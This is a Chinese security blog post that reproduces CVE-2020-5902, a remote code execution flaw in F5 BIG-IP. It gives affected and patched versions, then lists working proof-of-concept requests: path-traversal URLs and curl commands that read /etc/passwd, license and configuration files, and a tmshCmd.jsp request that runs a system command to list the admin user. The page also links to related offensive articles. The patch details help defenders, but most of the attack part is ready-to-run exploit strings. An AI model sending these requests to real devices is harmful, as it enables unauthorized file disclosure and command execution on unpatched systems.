新秀漏洞资讯

CVE-2020-5902 BIG-IP RCE漏洞复现&exp

简介

安全厂商Positive Technologies揭露F5 Networks的知名网络和安全产品BIG IP应用交付控制器(应用交付控制器,ADC)存在一个重大安全漏洞,可能让不具授权的远程攻击者执行指令,并获得系统完整控制权,包括拦截流经该设备的应用流量。

影响范围

版本号主要如下

11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

修复方法

升级

11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

文件读取Poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

63075-mg1noh9zasf.png

RCE poc

curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
78540-pa7jhb65jfg.png

参考

来源:宽字节安全

本文来自投稿,不代表本站立场,如若转载,请注明出处:http://www.csxxaq.com/bug/1365.html
两行代码 Linux安装Metasploit,非常简单
« 上一篇 07-03
【更新】【补丁绕过】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告更新
下一篇 » 07-08

相关推荐

「翻译」 如何Bypass rbash

前言我们都知道安全分析师和黑客的关系像tom和jerry一样,一个人采取措施加强安全等级,另外一个人试图绕过它。这种类似的情况出现在我解决CTF挑战的时候...

Joomla漏洞总结

以下文章来源于黑白天 ,作者kevinJoomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现漏洞描述Joomla是一套内容管理系统,是使用P...

新秀红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

新秀渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...